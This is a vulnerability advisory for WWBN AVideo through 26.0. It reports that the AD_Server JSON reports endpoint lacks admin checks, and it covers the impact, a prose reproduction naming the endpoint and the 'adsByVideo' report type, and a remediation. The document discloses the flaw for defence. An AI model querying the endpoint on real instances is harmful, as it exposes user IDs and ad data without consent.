WWBN AVideo Unauthenticated Access to AD_Server JSON Reports Endpoint Vulnerability

A vulnerability exists in WWBN AVideo versions through 26.0, where the 'plugin/AD_Server/reports.json.php' endpoint lacks authentication and authorization checks. This oversight allows unauthenticated attackers to access ad campaign analytics data, including video titles, user channel names, user IDs, ad campaign names, and impression/click counts. While the HTML and CSV counterparts of this report correctly restrict access to admin users, the JSON API remains unprotected. The vulnerability arises because the endpoint fails to verify if the requester is an authenticated admin, leaving sensitive data exposed to the public.

Impact

Exploitation of this vulnerability allows unauthenticated attackers to access sensitive ad campaign analytics and user data that should be restricted to administrators. This includes the ability to enumerate platform users by extracting user IDs and channel names, access detailed ad performance metrics, and on multi-tenant instances, gather competitive intelligence by extracting another content creator's ad performance data.

Reproduction

The vulnerability can be reproduced by sending a request to the 'plugin/AD_Server/reports.json.php' endpoint without any authentication. Several report types can be requested, each returning different sets of data. For example, the 'adsByVideo' report type returns a JSON array with video titles, channel names, user IDs, and campaign names. This endpoint can be accessed using a simple curl command, demonstrating the lack of authentication.

Remediation

To address this vulnerability, add 'User::isAdmin()' checks to both 'reports.json.php' and 'getData.json.php' files, similar to the existing checks in their HTML and CSV counterparts.